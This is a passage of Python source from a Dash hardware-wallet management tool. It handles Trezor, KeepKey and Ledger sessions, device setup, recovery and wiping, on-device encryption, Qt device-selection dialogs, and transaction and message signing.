if 0 <= index < len(self.__hw_devices):
self.set_current_device(self.__hw_devices[index])
else:
raise Exception('Device index out of bounds.')
@hw_connection_tracker
def open_hw_session(self, hw_device: HWDevice, force_reconnect: bool = False):
if hw_device.hw_client and force_reconnect:
self.close_hw_session(hw_device)
reconnected = True
else:
reconnected = False
if not hw_device.hw_client:
if hw_device.hw_type == HWType.trezor:
hw_device.hw_client = trezor.open_session(hw_device.device_id, hw_device.transport_id)
if hw_device.hw_client and hw_device.hw_client.features:
hw_device.bootloader_mode = hw_device.hw_client.features.bootloader_mode
else:
hw_device.bootloader_mode = False
if reconnected and hw_device.hw_client:
trezor.apply_device_attributes(hw_device, hw_device.hw_client)
elif hw_device.hw_type == HWType.keepkey:
hw_device.hw_client = keepkey.open_session(hw_device.device_id, self.__passphrase_encoding)
if hw_device.hw_client and hw_device.hw_client.features:
hw_device.bootloader_mode = hw_device.hw_client.features.bootloader_mode
else:
hw_device.bootloader_mode = False
if reconnected:
keepkey.apply_device_attributes(hw_device, hw_device.hw_client)
elif hw_device.hw_type == HWType.ledger_nano:
hw_device.hw_client = ledger.open_session(cast(ledger.HIDDongleHIDAPI, hw_device.transport_id))
else:
raise Exception('Invalid HW type: ' + str(hw_device.hw_type))
@hw_connection_tracker
def close_hw_session(self, hw_device: HWDevice):
if hw_device.hw_client:
try:
if hw_device.hw_type == HWType.trezor:
trezor.close_session(hw_device.hw_client)
elif hw_device.hw_type == HWType.keepkey:
keepkey.close_session(hw_device.hw_client)
elif hw_device.hw_type == HWType.ledger_nano:
ledger.close_session(cast(ledger.HIDDongleHIDAPI, hw_device.transport_id))
del hw_device.hw_client
hw_device.hw_client = None
except Exception:
# probably already disconnected
logging.exception('Disconnect HW error')
@hw_connection_tracker
def select_device(self, parent_dialog, open_client_session: bool = False) -> Optional[HWDevice]:
self.load_hw_devices()
dlg = SelectHWDeviceDlg(parent_dialog, "Select hardware wallet device", self)
if dlg.exec_():
self.set_current_device(dlg.selected_hw_device)
if dlg.selected_hw_device and open_client_session:
self.open_hw_session(dlg.selected_hw_device)
return dlg.selected_hw_device
return None
def ping_device(self, hw_device: HWDevice):
opened_session_here = False
try:
if not hw_device.hw_client:
self.open_hw_session(hw_device)
opened_session_here = True
ping_device(hw_device, 'Hello from DMT')
except Exception as e:
raise
finally:
if opened_session_here:
self.close_hw_session(hw_device)
@hw_connection_tracker
def initialize_device(self, hw_device: HWDevice, word_count: int, passphrase_enabled: bool, pin_enabled: bool,
hw_label: str, parent_window=None) -> Optional[str]:
"""
Initialize the device with newly generated seed words.
:return: Device id. If the device is wiped before initialization, a new device id is generated.
"""
def load(ctrl) -> Optional[str]:
ctrl.dlg_config(dlg_title="Please confirm", show_progress_bar=False)
ctrl.display_msg('<b>Read the messages displayed on your hardware wallet <br>'
'and click the confirmation button when necessary...</b>')
if hw_device.device_id or hw_device.hw_client:
if hw_device.hw_type == HWType.trezor:
return trezor.initialize_device(hw_device.device_id, hw_device.transport_id, hw_device.hw_client,
strength, passphrase_enabled, pin_enabled, hw_label)
elif hw_device.hw_type == HWType.keepkey:
return keepkey.initialize_device(hw_device.device_id, hw_device.hw_client, strength,
passphrase_enabled, pin_enabled, hw_label,
self.__passphrase_encoding)
else:
raise Exception('Not supported by Ledger Nano S.')
if hw_device.hw_type == HWType.ledger_nano:
raise Exception('Not supported by Ledger Nano S.')
else:
if word_count not in (12, 18, 24):
raise Exception('Invalid word count.')
strength = {24: 32, 18: 24, 12: 16}.get(word_count) * 8
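# Note: 'strength' is the BIP39 entropy in bits: 12 words -> 128, 18 words -> 192, 24 words -> 256.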
new_hw_device_id = WndUtils.run_thread_dialog(load, (), True, center_by_window=parent_window)
# during the initialization device_id (on Trezor) and some other values might have changed
# so we need to reload them
if new_hw_device_id != hw_device.device_id:
if self.__hw_device_id_selected == hw_device.device_id:
self.__hw_device_id_selected = new_hw_device_id
hw_device.device_id = new_hw_device_id
if hw_device.hw_client is not None:
try:
# reopen the client connection as some values read from it could have been changed
# during the initialization
self.open_hw_session(hw_device, force_reconnect=True)
except Exception as e:
log.warning("Couldn't reconnect hardware wallet after initialization: " + str(e))
return new_hw_device_id
@hw_connection_tracker
def recover_device(self, hw_device: HWDevice, word_count: int, passphrase_enabled: bool, pin_enabled: bool,
hw_label: str, input_type: Literal["scrambled_words", "matrix"],
parent_window=None) -> Optional[str]:
"""
Recover hardware wallet using seed words and the device screen.
:return: The device id. If the device is wiped before recovery, a new device id is generated.
"""
def load(ctrl: CtrlObject) -> Optional[str]:
ctrl.dlg_config(dlg_title="Please confirm", show_progress_bar=False)
ctrl.display_msg('<b>Read the messages displayed on your hardware wallet <br>'
'and click the confirmation button when necessary...</b>')
if hw_device.device_id or hw_device.hw_client:
if hw_device.hw_type == HWType.trezor:
return trezor.recover_device(hw_device.device_id, hw_device.transport_id, hw_device.hw_client,
word_count, passphrase_enabled, pin_enabled, hw_label, input_type,
ctrl.dialog)
elif hw_device.hw_type == HWType.keepkey:
return keepkey.recover_device(hw_device.device_id, hw_device.hw_client, word_count,
passphrase_enabled, pin_enabled, hw_label, self.__passphrase_encoding,
ctrl.dialog)
else:
raise HWNotConnectedException()
if hw_device.hw_type == HWType.ledger_nano:
raise Exception('Not supported by Ledger Nano S.')
else:
new_hw_device_id = WndUtils.run_thread_dialog(load, (), True, center_by_window=parent_window)
# during the recovery device_id (on Trezor) and some other values might have changed
# so we need to reload them
if new_hw_device_id != hw_device.device_id:
if self.__hw_device_id_selected == hw_device.device_id:
self.__hw_device_id_selected = new_hw_device_id
hw_device.device_id = new_hw_device_id
if hw_device.hw_client is not None:
try:
# reopen the client connection as some values read from it could have been changed
# during the initialization
self.open_hw_session(hw_device, force_reconnect=True)
except Exception as e:
log.warning("Couldn't reconnect hardware wallet after recovery: " + str(e))
return new_hw_device_id
@hw_connection_tracker
def recover_device_with_seed_input(self, hw_device: HWDevice, mnemonic_words: str, pin: str, passphrase: str,
secondary_pin: str) -> Optional[str]:
"""
Initializes hardware wallet with the mnemonic words provided by the user.
"""
if hw_device.device_id or hw_device.hw_client:
if hw_device.hw_type == HWType.ledger_nano:
hw_device_id = ledger.recover_device_with_seed_input(
cast(ledger.HIDDongleHIDAPI, hw_device.transport_id), mnemonic_words, pin, passphrase,
secondary_pin)
return hw_device_id
else:
raise Exception('Not available for Trezor/Keepkey')
@hw_connection_tracker
def wipe_device(self, hw_device: HWDevice, parent_window=None) -> str:
"""
Wipes the hardware wallet device.
"""
def wipe(ctrl):
ctrl.dlg_config(dlg_title="Confirm wiping device.", show_progress_bar=False)
ctrl.display_msg('<b>Read the messages displayed on your hardware wallet <br>'
'and click the confirmation button when necessary...</b>')
if hw_device.device_id or hw_device.hw_client:
if hw_device.hw_type == HWType.trezor:
return trezor.wipe_device(hw_device.device_id, hw_device.transport_id, hw_device.hw_client)
elif hw_device.hw_type == HWType.keepkey:
return keepkey.wipe_device(hw_device.device_id, hw_device.hw_client, self.__passphrase_encoding)
else:
raise Exception('Not supported by Ledger Nano.')
new_hw_device_id = WndUtils.run_thread_dialog(wipe, (), True, center_by_window=parent_window)
# during the wipe, device_id (on Trezor) and other values change, so here we need to reload them
if new_hw_device_id != hw_device.device_id:
if self.__hw_device_id_selected == hw_device.device_id:
self.__hw_device_id_selected = new_hw_device_id
hw_device.device_id = new_hw_device_id
if hw_device.hw_client is not None:
try:
# reopen the client connection as some values read from it could have been changed
# during the initialization
self.open_hw_session(hw_device, force_reconnect=True)
except Exception as e:
log.warning("Couldn't reconnect hardware wallet after initialization: " + str(e))
return new_hw_device_id
@staticmethod
def change_pin(hw_device: HWDevice, remove=False):
if hw_device and hw_device.hw_client:
change_pin(hw_device, remove)
@staticmethod
def set_passphrase_option(hw_device: HWDevice, enabled: bool):
if hw_device and hw_device.hw_client:
set_passphrase_option(hw_device, enabled)
@staticmethod
def set_passphrase_always_on_device(hw_device: HWDevice, enabled: bool):
if hw_device and hw_device.hw_client:
set_passphrase_always_on_device(hw_device, enabled)
@staticmethod
def set_wipe_code(hw_device: HWDevice, remove: bool):
if hw_device and hw_device.hw_client:
set_wipe_code(hw_device, remove)
@staticmethod
def set_sd_protect(hw_device: HWDevice, operation: Literal["enable", "disable", "refresh"]):
if hw_device and hw_device.hw_client:
set_sd_protect(hw_device, operation)
@hw_connection_tracker
def set_label(self, hw_device: HWDevice, label: str):
if hw_device and hw_device.hw_client:
set_label(hw_device, label)
if hw_device.hw_type in (HWType.trezor, HWType.keepkey) and hw_device.hw_client:
trezor.apply_device_attributes(hw_device, hw_device.hw_client)
@staticmethod
def hw_encrypt_value(hw_device: HWDevice, bip32_path_n: List[int], label: str,
value: bytes, ask_on_encrypt=True, ask_on_decrypt=True) -> Tuple[bytearray, bytearray]:
"""
Encrypts value with hardware wallet.
:return Tuple
0: encrypted data
1: public key
"""
def encrypt(ctrl: CtrlObject):
ctrl.dlg_config(dlg_title="Data encryption", show_progress_bar=False)
ctrl.display_msg(f'<b>Encrypting \'{label}\'...</b>'
f'<br><br>Enter the hardware wallet PIN/passphrase (if needed) to encrypt data.<br><br>'
f'<b>Note:</b> encryption passphrase is independent from the wallet passphrase <br>'
f'and can vary for each encrypted file.')
if hw_device.hw_type == HWType.trezor:
try:
data = trezorlib.misc.encrypt_keyvalue(hw_device.hw_client, cast(Address, bip32_path_n), label,
value, ask_on_encrypt, ask_on_decrypt)
pub_key = trezorlib.btc.get_public_node(hw_device.hw_client, bip32_path_n).node.public_key
return data, pub_key
except (CancelException, trezorlib.exceptions.Cancelled):
raise CancelException()
elif hw_device.hw_type == HWType.keepkey:
data = hw_device.hw_client.encrypt_keyvalue(bip32_path_n, label, value, ask_on_encrypt, ask_on_decrypt)
pub_key = hw_device.hw_client.get_public_node(bip32_path_n).node.public_key
return data, pub_key
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Feature not available for Ledger Nano S.')
else:
raise Exception('Invalid HW type: ' + HWType.get_desc(hw_device.hw_type))
if len(value) != 32:
raise ValueError("Invalid password length (<> 32).")
return WndUtils.run_thread_dialog(
encrypt, (), True, force_close_dlg_callback=partial(cancel_hw_thread_dialog, hw_device.hw_client),
show_window_delay_ms=200)
@staticmethod
def hw_decrypt_value(hw_device: HWDevice, bip32_path_n: List[int], label: str,
value: bytes, ask_on_encrypt=True, ask_on_decrypt=True) -> Tuple[bytearray, bytearray]:
"""
Decrypts value using hardware wallet.
:return Tuple
0: decrypted data
1: public key
"""
def decrypt(ctrl: CtrlObject):
ctrl.dlg_config(dlg_title="Data decryption", show_progress_bar=False)
ctrl.display_msg(f'<b>Decrypting \'{label}\'...</b><br><br>Enter the hardware wallet PIN/passphrase '
f'(if needed)<br> and click the confirmation button to decrypt data.')
if hw_device.hw_type == HWType.trezor:
try:
client = hw_device.hw_client
data = trezorlib.misc.decrypt_keyvalue(client, cast(Address, bip32_path_n), label, value,
ask_on_encrypt, ask_on_decrypt)
pub_key = trezorlib.btc.get_public_node(client, bip32_path_n).node.public_key
return data, pub_key
except (CancelException, trezorlib.exceptions.Cancelled):
raise CancelException()
elif hw_device.hw_type == HWType.keepkey:
client = hw_device.hw_client
data = client.decrypt_keyvalue(bip32_path_n, label, value, ask_on_encrypt, ask_on_decrypt)
pub_key = client.get_public_node(bip32_path_n).node.public_key
return data, pub_key
elif hw_device.hw_type == HWType.ledger_nano:
raise Exception('Feature not available for Ledger Nano S.')
else:
raise Exception('Invalid HW type: ' + HWType.get_desc(hw_device.hw_type))
if len(value) != 32:
raise ValueError("Invalid password length (<> 32).")
return WndUtils.run_thread_dialog(
decrypt, (), True, force_close_dlg_callback=partial(cancel_hw_thread_dialog, hw_device.hw_client))
class HwSessionInfo(HWSessionBase):
sig_hw_connected = QtCore.pyqtSignal(HWDevice)
sig_hw_disconnected = QtCore.pyqtSignal()
sig_hw_connection_error = QtCore.pyqtSignal(str)
def __init__(self, main_dlg, app_config: 'AppConfig', runtime_data: AppRuntimeData):
super().__init__()
self.__locks = {} # key: hw_client, value: EnhRLock
self.__main_dlg = main_dlg
self.__runtime_data: AppRuntimeData = runtime_data
self.__base_bip32_path: str = ''
self.__base_public_key: bytes = b''
self.__hd_tree_ident: str = ''
self.__use_webusb = app_config.trezor_webusb
self.__use_bridge = app_config.trezor_bridge
self.__use_udp = app_config.trezor_udp
self.__use_hid = app_config.trezor_hid
self.__passphrase_encoding: Optional[str] = app_config.hw_keepkey_psw_encoding
self.__hw_devices = HWDevices(use_webusb=self.__use_webusb, use_bridge=self.__use_bridge,
use_udp=self.__use_udp, use_hid=self.__use_hid,
passphrase_encoding=self.__passphrase_encoding)
def signal_hw_connected(self):
self.sig_hw_connected.emit(self.hw_device)
def signal_hw_disconnected(self):
self.sig_hw_disconnected.emit()
def signal_hw_connection_error(self, message):
self.sig_hw_connection_error.emit(message)
@property
def hw_device(self) -> Optional[HWDevice]:
return self.__hw_devices.get_selected_device()
def get_hw_client(self) -> Optional[object]:
hw_device = self.hw_device
if hw_device:
return hw_device.hw_client
return None
@property
def runtime_data(self) -> AppRuntimeData:
return self.__runtime_data
@property
def hw_type(self) -> Optional[HWType]:
if self.hw_device:
return self.hw_device.hw_type
else:
return None
@property
def hw_model(self) -> Optional[HWModel]:
if self.hw_device:
return self.hw_device.get_hw_model()
return None
def acquire_client(self):
cli = self.hw_client
if cli:
lock = self.__locks.get(cli)
if not lock:
lock = EnhRLock()
self.__locks[cli] = lock
lock.acquire()
def release_client(self):
cli = self.hw_client
if cli:
lock = self.__locks.get(cli)
if not lock:
raise Exception(f'Lock for client {str(cli)} not acquired before.')
lock.release()
def set_base_info(self, bip32_path: str, public_key: bytes):
self.__base_bip32_path = bip32_path
self.__base_public_key = public_key
self.__hd_tree_ident = SHA256.new(public_key).digest().hex()
@property
def base_bip32_path(self):
return self.__base_bip32_path
@property
def base_public_key(self):
return self.__base_public_key
def get_hd_tree_ident(self, coin_name: str):
if not coin_name:
raise Exception('Missing coin name')
if not self.__hd_tree_ident:
raise HWNotConnectedException()
return self.__hd_tree_ident + bytes(coin_name, 'ascii').hex()
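# Illustrative example: for coin_name 'Dash' the returned ident is the SHA256 hex digest of the
# base public key followed by '44617368' (the ASCII hex of 'Dash').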
def initiate_hw_session(self):
"""
Read information from the hw device that will cause it to ask the user for the BIP39 passphrase if necessary.
The point is to make sure that the device is fully initialized and ready for subsequent calls.
"""
def get_session_info_trezor(get_public_node_fun, hw_device_):
def call_get_public_node(_, get_public_node_fun_, path_n_):
pk = get_public_node_fun_(path_n_).node.public_key
return pk
path_ = dash_utils.get_default_bip32_base_path(self.__runtime_data.dash_network)
path_n = dash_utils.bip32_path_string_to_n(path_)
# show message for Trezor device while waiting for the user to choose the passphrase input method
pub = WndUtils.run_thread_dialog(
call_get_public_node, (get_public_node_fun, path_n),
title=DEFAULT_HW_BUSY_TITLE, text=DEFAULT_HW_BUSY_MESSAGE,
force_close_dlg_callback=partial(cancel_hw_thread_dialog, hw_device_.hw_client),
show_window_delay_ms=1000)
if pub:
self.set_base_info(path_, pub)
else:
raise Exception('Couldn\'t read data from the hardware wallet.')
hw_device = self.hw_device
if not hw_device:
raise Exception('Internal error: hw device not ready')
self.__hw_devices.open_hw_session(hw_device)
try:
if hw_device.hw_type == HWType.trezor:
try:
fun = partial(trezorlib.btc.get_public_node, hw_device.hw_client)
get_session_info_trezor(fun, hw_device)
except trezorlib.exceptions.Cancelled:
raise CancelException()
except trezorlib.exceptions.PinException as e:
raise HWPinException(e.args[1])
elif hw_device.hw_type == HWType.keepkey:
try:
get_session_info_trezor(hw_device.hw_client.get_public_node, hw_device)
except keepkeylib.client.PinException as e:
raise HWPinException(e.args[1])
elif hw_device.hw_type == HWType.ledger_nano:
path = dash_utils.get_default_bip32_base_path(self.__runtime_data.dash_network)
ap = ledger.get_address_and_pubkey(self, path)
self.set_base_info(path, ap['publicKey'])
except CancelException:
cancel_hw_operation(hw_device.hw_client)
self.__hw_devices.close_hw_session(hw_device)
raise
except Exception:
# in the case of error close the session
self.__hw_devices.close_hw_session(hw_device)
raise
def connect_hardware_wallet_main_th(self, reload_devices: bool = False) -> Optional[object]:
"""
Connects to hardware wallet device if not connected before. It must be called from the main thread.
:return: Reference to hw client or None if not connected.
"""
ret = None
reload_devices_ = reload_devices
if (not reload_devices_ and not self.__hw_devices.get_devices()) or not self.hw_client:
# (re)load hardware wallet devices connected to the computer, if they haven't been loaded yet
# or there is no session currently open to a hw device
reload_devices_ = True
self.__hw_devices.load_hw_devices(reload_devices_)
if not self.hw_client:
if len(self.__hw_devices.get_devices()) == 1:
self.__hw_devices.set_current_device_by_index(0)
elif len(self.__hw_devices.get_devices()) > 1:
device = self.__hw_devices.select_device(self.__main_dlg)
if not device:
raise CancelException('Cancelled')
else:
raise HWNotConnectedException("No hardware wallet device detected.")
try:
try:
self.initiate_hw_session()
if self.__runtime_data.dash_network == 'TESTNET':
# check if Dash testnet is supported by this hardware wallet
found_testnet_support = False
if self.hw_type in (HWType.trezor, HWType.keepkey):
try:
path = dash_utils.get_default_bip32_base_path(self.__runtime_data.dash_network)
path += "/0'/0/0"
path_n = dash_utils.bip32_path_string_to_n(path)
addr = get_address(self, path_n, False)
if addr and dash_utils.validate_address(addr, self.__runtime_data.dash_network):
found_testnet_support = True
except Exception as e:
if str(e).find('Invalid coin name') < 0:
raise
elif self.hw_type == HWType.ledger_nano:
addr = get_address(self, dash_utils.get_default_bip32_path(
self.__runtime_data.dash_network))
if dash_utils.validate_address(addr, self.__runtime_data.dash_network):
found_testnet_support = True
if not found_testnet_support:
url = get_note_url('DMT0002')
msg = f'Your hardware wallet device does not support Dash TESTNET ' \
f'(<a href="{url}">see details</a>).'
try:
self.disconnect_hardware_wallet()
except Exception:
pass
self.signal_hw_connection_error(msg)
return
self.signal_hw_connected()
except CancelException:
raise
except Exception as e:
logging.exception('Exception while connecting hardware wallet')
try:
self.disconnect_hardware_wallet()
except Exception:
pass
self.signal_hw_connection_error(str(e))
ret = self.hw_client
except CancelException:
raise
except HWPinException as e:
self.error_msg(e.msg)
if self.hw_client:
self.hw_client.clear_session()
except OSError:
self.error_msg('Cannot open %s device.' % self.getHwName(), True)
except Exception:
if self.hw_client:
self.hw_client.init_device()
else:
ret = self.hw_client
return ret
def connect_hardware_wallet(self) -> Optional[object]:
"""
Connects to hardware wallet device if not connected before.
:return: Reference to hw client or None if not connected.
"""
client = WndUtils.call_in_main_thread(self.connect_hardware_wallet_main_th)
return client
def disconnect_hardware_wallet(self) -> None:
if self.hw_client:
self.__hw_devices.close_hw_session(self.hw_device)
self.signal_hw_disconnected()
def save_state(self):
self.__hw_devices.save_state()
def restore_state(self):
self.__hw_devices.restore_state()
def set_hw_types_allowed(self, allowed: Tuple[HWType, ...]):
self.__hw_devices.set_hw_types_allowed(allowed)
def hw_encrypt_value(self, bip32_path_n: List[int], label: str,
value: bytes, ask_on_encrypt=True, ask_on_decrypt=True) -> Tuple[bytearray, bytearray]:
if self.connect_hardware_wallet():
hw_device = self.__hw_devices.get_selected_device()
if hw_device:
if hw_device.hw_type not in (HWType.trezor, HWType.keepkey):
raise Exception(HWType.get_desc(hw_device.hw_type) + ' device does not support data encryption.' )
return self.__hw_devices.hw_encrypt_value(self.__hw_devices.get_selected_device(), bip32_path_n, label,
value, ask_on_encrypt, ask_on_decrypt)
else:
raise Exception('Hardware wallet not available')
else:
raise Exception('Hardware wallet not available')
def hw_decrypt_value(self, bip32_path_n: List[int], label: str,
value: bytes, ask_on_encrypt=True, ask_on_decrypt=True) -> Tuple[bytearray, bytearray]:
if self.connect_hardware_wallet():
hw_device = self.__hw_devices.get_selected_device()
if hw_device:
if hw_device.hw_type not in (HWType.trezor, HWType.keepkey):
raise Exception(HWType.get_desc(hw_device.hw_type) + ' device does not support data encryption.' )
return self.__hw_devices.hw_decrypt_value(self.__hw_devices.get_selected_device(), bip32_path_n, label,
value, ask_on_encrypt, ask_on_decrypt)
else:
raise Exception('Hardware wallet not available')
else:
raise Exception('Hardware wallet not available')
class HWDevicesListWdg(QWidget):
sig_device_toggled = QtCore.pyqtSignal(HWDevice, bool)
def __init__(self, parent, hw_devices: HWDevices):
QWidget.__init__(self, parent=parent)
self.hw_devices: HWDevices = hw_devices
self.layout_main: Optional[QtWidgets.QVBoxLayout] = None
self.spacer: Optional[QtWidgets.QSpacerItem] = None
self.selected_hw_device: Optional[HWDevice] = self.hw_devices.get_selected_device()
self.setupUi(self)
def setupUi(self, dlg):
dlg.setObjectName("HWDevicesListWdg")
self.layout_main = QtWidgets.QVBoxLayout(dlg)
self.layout_main.setObjectName('layout_main')
self.layout_main.setContentsMargins(0, 0, 0, 0)
self.layout_main.setSpacing(3)
self.layout_main.setObjectName("verticalLayout")
self.spacer = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.layout_main.addItem(self.spacer)
self.retranslateUi(dlg)
QtCore.QMetaObject.connectSlotsByName(dlg)
self.devices_to_ui()
def retranslateUi(self, widget):
_translate = QtCore.QCoreApplication.translate
widget.setWindowTitle(_translate("HWDevicesListWdg", "Form"))
def set_selected_hw_device(self, hw_device: Optional[HWDevice]):
self.selected_hw_device = hw_device
def devices_to_ui(self):
selected_device = self.selected_hw_device
for hl_index in reversed(range(self.layout_main.count())):
ctrl = self.layout_main.itemAt(hl_index)
if ctrl and isinstance(ctrl, QtWidgets.QHBoxLayout) and ctrl.objectName() and \
ctrl.objectName().startswith('hl-hw-device-'):
WndUtils.remove_item_from_layout(self.layout_main, ctrl)
# create a list of radio buttons associated with each hw device connected to the computer;
# each radio button is enclosed inside a horizontal layout along with a hyperlink control
# allowing the identification of the appropriate hw device by highlighting its screen
insert_idx = self.layout_main.indexOf(self.spacer)
dev_cnt = len(self.hw_devices.get_devices())
for idx, dev in enumerate(self.hw_devices.get_devices()):
hl = QtWidgets.QHBoxLayout()
hl.setSpacing(4)
hl.setObjectName('hl-hw-device-' + str(idx))
self.layout_main.insertLayout(insert_idx, hl)
rb = QtWidgets.QRadioButton(self)
rb.setText(dev.get_description())
rb.toggled.connect(partial(self.on_device_rb_toggled, idx))
if selected_device == dev:
rb.setChecked(True)
hl.addWidget(rb)
if dev_cnt > 1:
# show the link allowing identification of a hw device only if more than one is connected to the computer
lnk = QtWidgets.QLabel(self)
lnk.setText('[<a href="identify-hw-device">ping device</a>]')
lnk.linkActivated.connect(partial(self.on_hw_show_link_activated, dev))
hl.addWidget(lnk)
hl.addSpacerItem(
QtWidgets.QSpacerItem(10, 10, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum))
insert_idx += 1
def on_device_rb_toggled(self, hw_device_index: int, checked: bool):
devs = self.hw_devices.get_devices()
if 0 <= hw_device_index < len(devs):
self.sig_device_toggled.emit(devs[hw_device_index], checked)
def on_hw_show_link_activated(self, hw_device, link):
try:
self.hw_devices.ping_device(hw_device)
except Exception as e:
WndUtils.error_msg(str(e), True)
def update(self):
self.devices_to_ui()
class SelectHWDeviceDlg(QDialog):
def __init__(self, parent, label: str, hw_devices: HWDevices):
QDialog.__init__(self, parent=parent)
self.hw_devices: HWDevices = hw_devices
self.selected_hw_device: Optional[HWDevice] = self.hw_devices.get_selected_device()
self.label = label
self.lay_main: Optional[QtWidgets.QVBoxLayout] = None
self.device_list_wdg: Optional[HWDevicesListWdg] = None
self.lbl_title: Optional[QtWidgets.QLabel] = None
self.btnbox_main: Optional[QtWidgets.QDialogButtonBox] = None
self.tm_update_dlg_size: Optional[int] = None
self.setupUi(self)
def setupUi(self, dialog):
dialog.setObjectName("SelectHWDevice")
self.lay_main = QtWidgets.QVBoxLayout(dialog)
self.lay_main.setContentsMargins(12, 12, 12, 3)
self.lay_main.setSpacing(12)
self.lay_main.setObjectName("lay_main")
self.device_list_wdg = HWDevicesListWdg(self.parent(), self.hw_devices)
self.device_list_wdg.sig_device_toggled.connect(self.on_device_toggled)
self.lbl_title = QtWidgets.QLabel(dialog)
self.lbl_title.setText(
'<span><b>Select your hardware wallet device</b> [<a href="reload-devices">reload devices</a>]</span>')
self.lbl_title.linkActivated.connect(self.on_reload_hw_devices)
self.lay_main.addWidget(self.lbl_title)
self.lay_main.addWidget(self.device_list_wdg)
self.btnbox_main = QtWidgets.QDialogButtonBox(dialog)
self.btnbox_main.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel | QtWidgets.QDialogButtonBox.Ok)
self.btnbox_main.setObjectName("btn_main")
self.btnbox_main.accepted.connect(self.on_btn_main_accepted)
self.btnbox_main.rejected.connect(self.on_btn_main_rejected)
self.lay_main.addWidget(self.btnbox_main)
self.retranslateUi(dialog)
self.setFixedSize(self.sizeHint())
self.update_buttons_state()
def retranslateUi(self, dialog):
_translate = QtCore.QCoreApplication.translate
dialog.setWindowTitle('Hardware wallet selection')
@pyqtSlot(HWDevice, bool)
def on_device_toggled(self, device: HWDevice, selected: bool):
if not selected:
if device == self.selected_hw_device:
self.selected_hw_device = None
else:
self.selected_hw_device = device
self.update_buttons_state()
def on_reload_hw_devices(self, link):
try:
selected_id = self.selected_hw_device.device_id if self.selected_hw_device else None
anything_changed = self.hw_devices.load_hw_devices(force_fetch=True)
if selected_id:
# restore the device selected in the device list if was selected before and is still connected
self.selected_hw_device = self.hw_devices.get_device_by_id(selected_id)
self.device_list_wdg.set_selected_hw_device(self.selected_hw_device)
if anything_changed:
self.device_list_wdg.update()
# launch a timer to resize the window - resizing it directly here has no effect
self.tm_update_dlg_size = self.startTimer(10)
except Exception as e:
WndUtils.error_msg(str(e), True)
def timerEvent(self, event):
if self.tm_update_dlg_size:
self.killTimer(self.tm_update_dlg_size)
self.tm_update_dlg_size = None
self.setFixedSize(self.sizeHint())
def update_buttons_state(self):
b = self.btnbox_main.button(QtWidgets.QDialogButtonBox.Ok)
if b:
b.setEnabled(self.selected_hw_device is not None)
def on_btn_main_accepted(self):
if self.selected_hw_device is not None:
self.accept()
def on_btn_main_rejected(self):
self.reject()
@control_hw_call
def sign_tx(hw_session: HwSessionInfo, utxos_to_spend: List[UtxoType], tx_outputs: List[TxOutputType], tx_fee):
"""
Creates a signed transaction.
:param hw_session:
:param utxos_to_spend: list of utxos to spend
:param tx_outputs: destination addresses. Fields: 0: dest Dash address. 1: the output value in satoshis,
2: the bip32 path of the address if the output is the change address or None otherwise
:param tx_fee: transaction fee
:return: tuple (serialized tx, total transaction amount in satoshis)
"""
def sign(ctrl):
ctrl.dlg_config(dlg_title="Confirm transaction signing.", show_progress_bar=False)
ctrl.display_msg('<b>Click the confirmation button on your hardware wallet<br>'
'and wait for the transaction to be signed...</b>')
if hw_session.hw_type == HWType.trezor:
return trezor.sign_tx(hw_session, hw_session.runtime_data, utxos_to_spend, tx_outputs, tx_fee)
elif hw_session.hw_type == HWType.keepkey:
return keepkey.sign_tx(hw_session, hw_session.runtime_data, utxos_to_spend, tx_outputs, tx_fee)
elif hw_session.hw_type == HWType.ledger_nano:
return ledger.sign_tx(hw_session, hw_session.runtime_data, utxos_to_spend, tx_outputs, tx_fee)
else:
logging.error('Invalid HW type: ' + str(hw_session.hw_type))
# execute the 'sign' function; because the call blocks the UI until the user clicks the HW
# button, it's done inside a thread within a dialog that shows an appropriate message to the user
sig = WndUtils.run_thread_dialog(sign, (), True,
force_close_dlg_callback=partial(cancel_hw_thread_dialog, hw_session.hw_client))
return sig
@control_hw_call
def hw_sign_message(hw_session: HwSessionInfo, hw_coin_name: str, bip32path, message, display_label: str = None):
def sign(ctrl, display_label_):
ctrl.dlg_config(dlg_title="Confirm message signing.", show_progress_bar=False)
if not display_label_:
if hw_session.hw_type == HWType.ledger_nano:
message_hash = hashlib.sha256(message.encode('ascii')).hexdigest().upper()
display_label_ = '<b>Click the confirmation button on your hardware wallet to sign the message...</b>' \
'<br><br><b>Message:</b><br><span>' + message + '</span><br><br><b>SHA256 hash</b>:' \
'<br>' + message_hash
else:
display_label_ = '<b>Click the confirmation button on your hardware wallet to sign the message...</b>'
ctrl.display_msg(display_label_)
if hw_session.hw_type == HWType.trezor:
return trezor.sign_message(hw_session.hw_client, hw_coin_name, bip32path, message)
elif hw_session.hw_type == HWType.keepkey:
return keepkey.sign_message(hw_session.hw_client, hw_coin_name, bip32path, message)
elif hw_session.hw_type == HWType.ledger_nano:
return ledger.sign_message(hw_session.hw_client, bip32path, message, hw_session)
else:
logging.error('Invalid HW type: ' + str(hw_session.hw_type))
# execute the 'sign' function; because the call blocks the UI until the user clicks the HW
# button, it's done inside a thread within a dialog that shows an appropriate message to the user
sig = WndUtils.run_thread_dialog(sign, (display_label,), True,
force_close_dlg_callback=partial(cancel_hw_thread_dialog, hw_session.hw_client))
return sig
@control_hw_call
def get_address(hw_session: HwSessionInfo, bip32_path: str, show_display: bool = False,
message_to_display: str = None):
def _get_address(ctrl):
nonlocal hw_session, bip32_path, show_display, message_to_display
if ctrl:
ctrl.dlg_config(dlg_title=DEFAULT_HW_BUSY_TITLE, show_progress_bar=False)
if message_to_display:
ctrl.display_msg(message_to_display)
else:
ctrl.display_msg('<b>Click the confirmation button on your hardware wallet to exit...</b>')
client = hw_session.hw_client
if client:
if isinstance(bip32_path, str):
bip32_path = bip32_path.strip()
if bip32_path.lower().find('m/') >= 0:
# removing m/ prefix because of keepkey library
bip32_path = bip32_path[2:]
if hw_session.hw_type == HWType.trezor:
try:
if isinstance(bip32_path, str):
bip32_path = dash_utils.bip32_path_string_to_n(bip32_path)
ret = trezorlib.btc.get_address(client, hw_session.runtime_data.hw_coin_name, bip32_path,
show_display)
return ret
except (CancelException, trezorlib.exceptions.Cancelled):
raise CancelException()
elif hw_session.hw_type == HWType.keepkey:
try:
if isinstance(bip32_path, str):
bip32_path = dash_utils.bip32_path_string_to_n(bip32_path)
